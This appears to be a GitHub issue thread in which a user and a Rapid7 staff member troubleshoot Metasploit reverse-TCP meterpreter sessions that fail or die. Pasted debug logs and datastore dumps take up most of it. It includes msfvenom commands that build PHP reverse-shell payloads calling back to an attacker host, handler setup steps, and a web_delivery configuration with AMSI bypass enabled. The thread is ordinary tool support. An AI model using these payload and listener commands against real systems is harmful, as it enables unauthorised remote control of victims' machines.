[09/09/2020 17:00:21] [d(1)] core: Module windows/x64/vncinject/bind_tcp_uuid is compatible with multi/handler
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with multi/handler]: reverse to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with multi/handler]: bind to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with multi/handler]: noconn to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with multi/handler]: none to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with multi/handler]: tunnel to tunnel
[09/09/2020 17:00:21] [d(1)] core: Module windows/x64/vncinject/reverse_http is compatible with multi/handler
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with multi/handler]: reverse to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with multi/handler]: bind to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with multi/handler]: noconn to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with multi/handler]: none to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with multi/handler]: tunnel to tunnel
[09/09/2020 17:00:21] [d(1)] core: Module windows/x64/vncinject/reverse_https is compatible with multi/handler
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with multi/handler]: reverse to reverse
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with multi/handler]: bind to reverse
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with multi/handler]: noconn to reverse
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with multi/handler]: none to reverse
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with multi/handler]: tunnel to reverse
[09/09/2020 17:00:21] [d(1)] core: Module windows/x64/vncinject/reverse_tcp is compatible with multi/handler
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with multi/handler]: reverse to reverse
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with multi/handler]: bind to reverse
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with multi/handler]: noconn to reverse
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with multi/handler]: none to reverse
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with multi/handler]: tunnel to reverse
[09/09/2020 17:00:21] [d(1)] core: Module windows/x64/vncinject/reverse_tcp_rc4 is compatible with multi/handler
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with multi/handler]: reverse to reverse
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with multi/handler]: bind to reverse
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with multi/handler]: noconn to reverse
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with multi/handler]: none to reverse
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with multi/handler]: tunnel to reverse
[09/09/2020 17:00:21] [d(1)] core: Module windows/x64/vncinject/reverse_tcp_uuid is compatible with multi/handler
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with multi/handler]: reverse to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with multi/handler]: bind to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with multi/handler]: noconn to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with multi/handler]: none to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with multi/handler]: tunnel to tunnel
[09/09/2020 17:00:21] [d(1)] core: Module windows/x64/vncinject/reverse_winhttp is compatible with multi/handler
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with multi/handler]: reverse to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with multi/handler]: bind to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with multi/handler]: noconn to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with multi/handler]: none to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with multi/handler]: tunnel to tunnel
[09/09/2020 17:00:21] [d(1)] core: Module windows/x64/vncinject/reverse_winhttps is compatible with multi/handler
[09/09/2020 17:00:21] [d(2)] core: Selected payload bsd/sparc/shell_reverse_tcp from generic payload generic/shell_reverse_tcp
[09/09/2020 17:02:17] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
Call stack:
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/io/stream.rb:203:in `get_once'
/usr/share/metasploit-framework/lib/msf/base/sessions/command_shell.rb:638:in `shell_read'
/usr/share/metasploit-framework/lib/msf/base/sessions/command_shell.rb:707:in `process_autoruns'
/usr/share/metasploit-framework/lib/msf/core/handler.rb:274:in `register_session'
/usr/share/metasploit-framework/lib/msf/core/handler.rb:252:in `create_session'
/usr/share/metasploit-framework/lib/msf/core/handler.rb:196:in `create_session'
/usr/share/metasploit-framework/lib/msf/core/handler.rb:135:in `handle_connection'
/usr/share/metasploit-framework/lib/msf/core/payload/generic.rb:151:in `redirect_to_actual'
/usr/share/metasploit-framework/lib/msf/core/payload/generic.rb:85:in `handle_connection'
/usr/share/metasploit-framework/lib/msf/core/handler/reverse_tcp.rb:160:in `block (2 levels) in start_handler'
/usr/share/metasploit-framework/lib/msf/core/handler/reverse_tcp.rb:137:in `loop'
/usr/share/metasploit-framework/lib/msf/core/handler/reverse_tcp.rb:137:in `block in start_handler'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:106:in `block in spawn'
[09/09/2020 17:09:25] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
Call stack:
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/sync/thread_safe.rb:36:in `select'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/sync/thread_safe.rb:36:in `select'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/sync/thread_safe.rb:76:in `sleep'
/usr/share/metasploit-framework/modules/exploits/multi/handler.rb:66:in `block in exploit'
/usr/share/metasploit-framework/modules/exploits/multi/handler.rb:63:in `loop'
/usr/share/metasploit-framework/modules/exploits/multi/handler.rb:63:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:215:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:169:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:140:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:164:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:55:in `exploit_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:201:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:158:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===
Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
Collapse
[framework/ui/console]
ActiveModule=exploit/multi/handler
[multi/handler]
PAYLOAD=generic/shell_reverse_tcp
WORKSPACE=
VERBOSE=false
WfsDelay=0
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
ExitOnSession=true
ListenerTimeout=0
LPORT=4444
LHOST=my ip
History
The following commands were ran during the session and before this issue occurred:
Collapse
242 use exploit/multi/handler
243 set LPORT 4444
244 set LHOST my ip
245 exploit
246 debug
Errors
The following errors occurred before the issue occurred:
Collapse
[09/09/2020 17:13:27] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 17:13:27] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 17:13:27] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 17:13:28] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 17:14:05] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 17:14:05] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 17:14:06] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 17:14:06] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 17:15:45] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
[09/09/2020 17:15:48] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
Logs
The following logs were recorded before the issue occurred:
Collapse
[09/09/2020 17:13:28] [d(2)] core: Stager windows/reverse_tcp_allports and stage osx/armle/shell have incompatible platforms: ["Windows"] - ["OSX"]
[09/09/2020 17:13:28] [d(2)] core: Stager windows/reverse_tcp_allports and stage osx/x64/meterpreter have incompatible platforms: ["Windows"] - ["OSX"]
[09/09/2020 17:13:28] [d(2)] core: Stager windows/reverse_tcp_allports and stage osx/x64/dupandexecve have incompatible platforms: ["Windows"] - ["OSX"]
[09/09/2020 17:13:28] [d(2)] core: Stager windows/reverse_tcp_allports and stage osx/x86/bundleinject have incompatible platforms: ["Windows"] - ["OSX"]
[09/09/2020 17:13:28] [d(2)] core: Stager windows/reverse_tcp_allports and stage osx/x86/isight have incompatible platforms: ["Windows"] - ["OSX"]
[09/09/2020 17:13:28] [d(2)] core: Stager windows/reverse_tcp_allports and stage osx/x86/vforkshell have incompatible platforms: ["Windows"] - ["OSX"]
[09/09/2020 17:13:28] [d(2)] core: Stager windows/reverse_tcp_allports and stage multi/meterpreter have incompatible platforms: ["Windows"] - ["Multi"]
[09/09/2020 17:13:28] [d(2)] core: Stager windows/reverse_tcp_allports and stage python/meterpreter have incompatible platforms: ["Windows"] - ["Python"]
[09/09/2020 17:13:28] [d(2)] core: Stager windows/bind_tcp and stage linux/aarch64/meterpreter have incompatible platforms: ["Windows"] - ["Linux"]
[09/09/2020 17:13:28] [d(2)] core: Stager windows/bind_tcp and stage linux/aarch64/shell have incompatible platforms: ["Windows"] - ["Linux"]
[09/09/2020 17:13:28] [d(2)] core: Stager windows/bind_tcp and stage linux/mipsbe/meterpreter have incompatible platforms: ["Windows"] - ["Linux"]
[09/09/2020 17:13:28] [d(2)] core: Stager windows/bind_tcp and stage linux/mipsbe/shell have incompatible platforms: ["Windows"] - ["Linux"]
[09/09/2020 17:13:28] [d(2)] core: Stager windows/bind_tcp and stage linux/mipsle/meterpreter have incompatible platforms: ["Windows"] - ["Linux"]
[09/09/2020 17:13:28] [d(2)] core: Stager windows/bind_tcp and stage linux/mipsle/shell have incompatible platforms: ["Windows"] - ["Linux"]
[09/09/2020 17:13:28] [d(2)] core: Stager windows/bind_tcp and stage linux/armle/meterpreter have incompatible platforms: ["Windows"] - ["Linux"]
[09/09/2020 17:13:28] [d(2)] core: Stager windows/bind_tcp and stage linux/armle/shell have incompatible platforms: ["Windows"] - ["Linux"]
[09/09/2020 17:13:28] [d(2)] core: Stager windows/bind_tcp and stage linux/x64/meterpreter have incompatible platforms: ["Windows"] - ["Linux"]
[09/09/2020 17:13:28] [d(2)] core: Stager windows/bind_tcp and stage linux/x64/shell have incompatible platforms: ["Windows"] - ["Linux"]
[09/09/2020 17:13:28] [d(2)] core: Stager windows/bind_tcp and stage linux/x86/meterpreter have incompatible platforms: ["Windows"] - ["Linux"]
[09/09/2020 17:13:28] [d(2)] core: Stager windows/bind_tcp and stage linux/x86/shell have incompatible platforms: ["Windows"] - ["Linux"]
[09/09/2020 17:13:28] [d(2)] core: Stager windows/bind_tcp and stage bsd/x86/shell have incompatible platforms: ["Windows"] - ["BSD"]
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: sockedi to sockedi
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: handleedi to sockedi
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: http to sockedi
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: https to sockedi
[09/09/2020 17:13:28] [d(1)] core: Module is compatible with
[09/09/2020 17:13:28] [d(2)] core: Built staged payload windows/meterpreter/bind_tcp.
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: sockedi to sockedi
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: -http to sockedi
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: -https to sockedi
[09/09/2020 17:13:28] [d(1)] core: Module is compatible with
[09/09/2020 17:13:28] [d(2)] core: Built staged payload windows/patchupmeterpreter/bind_tcp.
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: sockedi to sockedi
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: -http to sockedi
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: -https to sockedi
[09/09/2020 17:13:28] [d(1)] core: Module is compatible with
[09/09/2020 17:13:28] [d(2)] core: Built staged payload windows/patchupdllinject/bind_tcp.
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: sockedi to sockedi
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: -https to sockedi
[09/09/2020 17:13:28] [d(1)] core: Module is compatible with
[09/09/2020 17:13:28] [d(2)] core: Built staged payload windows/vncinject/bind_tcp.
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: sockedi to sockedi
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: -https to sockedi
[09/09/2020 17:13:28] [d(1)] core: Module is compatible with
[09/09/2020 17:14:05] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 17:14:05] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 17:14:06] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 17:14:06] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 17:15:45] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
[09/09/2020 17:15:48] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
Version/Install
The versions and install method of your Metasploit setup:
Collapse
Framework: 5.0.101-dev
Ruby: ruby 2.7.1p83 (2020-03-31 revision a0c7c23c9c) [i386-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: Connected to msf. Connection type: postgresql. Connection name: #<Msf::DBManager:0x0532887c>.
Install Method: Other - Please specify
[] Started reverse TCP handler on 0.0.0.0:4444
[] Command shell session 1 opened (my ip:4444 -> 52.202.215.126 (CANYOUSEEME IP):37829) at 2020-09-09 17:15:45 -0400
[*] 52.202.215.126 - Command shell session 1 closed.
^C[-] Exploit failed [user-interrupt]: Interrupt
But that's mean that my payload doesn't open anything at all.
that's weird because that also mean that's my handler works correctly and that's also mean that's everything's is set up correctly because i'm pinging my ip with the specific port that i use to listen so i'm lost now.
apollyonfirstcome
on 9 Sep 2020
@apollyonfirstcome In future, please only submit the last 1000 or so lines. The line count there was well over 1000 lines and most of it wasn't relevant. Also please use triple backticks to enclose the output and mark it as code via standard Markdown format.
gwillcox-r7
on 9 Sep 2020
oke sorry.
apollyonfirstcome
on 9 Sep 2020
Np all good ๐ All a learning experience. Spoke to one of my colleagues about this, and he pointed out that it seems you aren't specifying the payload in the exploit/multi/handler, so its defaulting to the normal command payload handler, aka generic/shell_reverse_tcp . Try something like this:
use exploit/multi/handler
set PAYLOAD php/meterpreter/bind_tcp
set LHOST *your IP*
set LPORT 4444 (or whatever you set it to in when generating the payload)
exploit
If you don't specify the PAYLOAD option it will default to generic/shell_reverse_tcp which is not what you want. You can see this below with the output from MSF6:
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) >
sorry but i did set the payload correctly except for the last test because i do it precipitately because it is arround 2 am where i live so sorry but the probleme is still present. that's been said i can do it again to replace the last log that i given to you if that can help.
apollyonfirstcome
on 9 Sep 2020
i will do it more carefully next time sorry to make you lose your time with the last log MY BAD. So sorry
apollyonfirstcome
on 9 Sep 2020
No problem all good, take your time ๐ If its 2 am your time, then get some sleep ๐
gwillcox-r7
on 9 Sep 2020
oke thank's i will keep you update tomorrow if you're still available. And again thank's a lot because i'm on this issue since one week and i have some client so thank's a lot for you're time.
apollyonfirstcome
on 9 Sep 2020
did you have any news about this issue ?
apollyonfirstcome
on 10 Sep 2020
I change my vpn ip and then try again with thi two payload :
msfvenom -p php/meterpreter_reverse_tcp LHOST=mynewvpnip LPORT=8888 -f raw > /home/mycomput/Desktop/test1.php
msfvenom -p php/meterpreter_reverse_tcp LHOST=mynewvpnip LPORT=4444 -f raw > /home/mycomput/Desktop/test2.php
apollyonfirstcome
on 10 Sep 2020
===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===
Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
Collapse
[framework/ui/console]
ActiveModule=exploit/multi/handler
[multi/handler]
PAYLOAD=php/meterpreter_reverse_tcp
WORKSPACE=
VERBOSE=false
WfsDelay=0
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
ExitOnSession=true
ListenerTimeout=0
LHOST=MY new vpn ip
LPORT=4444
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
AutoLoadStdapi=true
AutoVerifySession=true
AutoVerifySessionTimeout=30
InitialAutoRunScript=
AutoRunScript=
AutoSystemInfo=true
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
AutoUnhookProcess=false
History
The following commands were ran during the session and before this issue occurred:
Collapse
248 use exploit/multi/handler
249 set payload php/meterpreter_reverse_tcp
250 set LHOST my new vpn ip
251 set LPORT 8888
252 show options
253 exploit
254 set LPORT 4444
255 show options
256 exploit
257 debug
Errors
The following errors occurred before the issue occurred:
Collapse
[09/10/2020 08:14:00] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/10/2020 08:23:25] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/10/2020 08:38:34] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:38:34] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:38:36] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/10/2020 08:38:36] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/10/2020 08:38:44] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/10/2020 08:47:19] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/10/2020 09:01:43] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/10/2020 09:16:36] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
Logs
The following logs were recorded before the issue occurred:
Collapse
[09/09/2020 17:13:28] [d(1)] core: Module is compatible with
[09/09/2020 17:13:28] [d(2)] core: Built staged payload windows/meterpreter/bind_tcp.
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: sockedi to sockedi
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: -http to sockedi
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: -https to sockedi
[09/09/2020 17:13:28] [d(1)] core: Module is compatible with
[09/09/2020 17:13:28] [d(2)] core: Built staged payload windows/patchupmeterpreter/bind_tcp.
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: sockedi to sockedi
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: -http to sockedi
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: -https to sockedi
[09/09/2020 17:13:28] [d(1)] core: Module is compatible with
[09/09/2020 17:13:28] [d(2)] core: Built staged payload windows/patchupdllinject/bind_tcp.
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: sockedi to sockedi
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: -https to sockedi
[09/09/2020 17:13:28] [d(1)] core: Module is compatible with
[09/09/2020 17:13:28] [d(2)] core: Built staged payload windows/vncinject/bind_tcp.
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: sockedi to sockedi
[09/09/2020 17:13:28] [d(3)] core: Checking compat [ with ]: -https to sockedi
[09/09/2020 17:13:28] [d(1)] core: Module is compatible with
[09/09/2020 17:14:05] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 17:14:05] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 17:14:06] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 17:14:06] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 17:15:45] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
[09/09/2020 17:15:48] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/10/2020 08:12:12] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:12:12] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:12:14] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/10/2020 08:12:14] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/10/2020 08:12:21] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:12:21] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:12:21] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/10/2020 08:12:22] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/10/2020 08:12:59] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:12:59] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:13:01] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/10/2020 08:13:01] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/10/2020 08:13:58] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:13:58] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:14:00] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/10/2020 08:14:00] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/10/2020 08:23:25] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/10/2020 08:38:34] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:38:34] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:38:36] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/10/2020 08:38:36] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/10/2020 08:38:44] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/10/2020 08:47:19] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/10/2020 09:01:43] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/10/2020 09:16:36] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
Version/Install
The versions and install method of your Metasploit setup:
Collapse
Framework: 5.0.101-dev
Ruby: ruby 2.7.1p83 (2020-03-31 revision a0c7c23c9c) [i386-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: Connected to msf. Connection type: postgresql. Connection name: #<Msf::DBManager:0x05a97158>.
Install Method: Other - Please specify
and still no ping back from my payload.
apollyonfirstcome
on 10 Sep 2020
@apollyonfirstcome So earlier you said it was connecting back and opening a session but the session died. Now your saying your not getting anything back from the server? Do you mind pasting the console output when you got that error? All I see is interrupts presumably from when you CTL+C'd the shell after waiting too long. The earlier errors from before are now gone at least.
gwillcox-r7
on 10 Sep 2020
Yes like i told you yesterday the session that was connected and died emediatly after come from canyouseeme.org (me cheking if my port are correctly open). Infact no session come from my payload it's why you see me doing a ctrl+c because the handler stay open but nothing happen so after 10 minute i quits the session handler.
apollyonfirstcome
on 10 Sep 2020
so if I don't verify that my port is open, then no session is created, so no error, just the handler remains open indefinitely.
apollyonfirstcome
on 10 Sep 2020
To be honest it sounds like a networking issue not something with Metasploit specifically. I would double check your setup; its hard for me to tell whats happening but if your not even getting a connection back then thats a little odd. Sounds like your port is still accessible on the target if canyouseeme.org is able to access it, but its possible whatever is connecting to it isn't connecting right or isn't making that connection attempt for some reason.
gwillcox-r7
on 10 Sep 2020
for my configuration, i work from a vm workstation pro on NAT connection but i've tested bridge connection also and the same problem occure. I use a vpn directly conected to my vm through wireguard . But i saught the problem may come from the adaptater of wireguard (wg0) that metasploit can't handle i think's.
apollyonfirstcome
on 10 Sep 2020
@apollyonfirstcome yeah its possible its not able to handle that, I'd try see if any other Metasploit module successfully connects through the VPN first. If that doesn't work, then you can confirm that its likely the VPN and Metasploit not being compatible for some reason.
gwillcox-r7
on 10 Sep 2020
Yes i will check that's too but before i reinstall an other vm with a different version of kali and i will try to use openvpn instead. I keep you updated.
apollyonfirstcome
on 10 Sep 2020
Oke i solved some issue. Like before a cannot have a session; but now i can receive the desired packet ( capture with wireshark ) that's start the desire session but unfortunately for me the sessions die instantly. So now i know that my payload works correctly with my vpn and my handler works too.
How does i fix this issue of having no session at all, i just run a new VM with a new metasploit-framework download from github, i run my vpn trough openvpn and make some improvement on it, so everything is almost good except for the session dying instantly UNFORTUNATELY.
I keep digging.
apollyonfirstcome
on 13 Sep 2020
Payload use linux/x86/meterpreter_reverse_tcp
[] Meterpreter session 1 opened (MYIP:4444 -> CORRECTIPFROMPAYLOAD:33719) at ........... -0400
[] desireip - Meterpreter session 1 closed. Reason: Died
===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===
Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
Collapse
[framework/ui/console]
ActiveModule=exploit/multi/script/web_delivery
[multi/script/web_delivery]
Payload=linux/x86/meterpreter_reverse_tcp
Powershell::exec_in_place=true
Powershell::remove_comsec=true
WORKSPACE=
VERBOSE=false
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
EXE::EICAR=false
EXE::Custom=
EXE::Path=
EXE::Template=
EXE::Inject=false
EXE::OldMethod=false
EXE::FallBack=false
MSI::EICAR=false
MSI::Custom=
MSI::Path=
MSI::Template=
MSI::UAC=false
Powershell::persist=false
Powershell::prepend_sleep=
Powershell::prepend_protections_bypass=false
Powershell::strip_comments=true
Powershell::strip_whitespace=false
Powershell::sub_vars=false
Powershell::sub_funcs=false
Powershell::exec_rc4=false
Powershell::remove_comspec=false
Powershell::noninteractive=true
Powershell::encode_final_payload=false
Powershell::encode_inner_payload=false
Powershell::wrap_double_quotes=true
Powershell::no_equals=false
Powershell::method=reflection
SRVHOST=0.0.0.0
SRVPORT=myport
ListenerComm=
SSL=false
SSLCert=
SSLCompression=false
SSLCipher=
TCP::max_send_size=0
TCP::send_delay=0
URIPATH=
HTTP::no_cache=false
HTTP::chunked=false
HTTP::header_folding=false
HTTP::junk_headers=false
HTTP::compression=none
HTTP::server_name=Apache
URIHOST=
URIPORT=
SendRobots=false
PSH-AmsiBypass=true
PSH-AmsiBypassURI=
PSH-EncodedCommand=true
PSH-ForceTLS12=true
PSH-Proxy=true
PSHBinary-PATH=
PSHBinary-FILENAME=
LHOST=my ip
target=6
LPORT=my port2
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
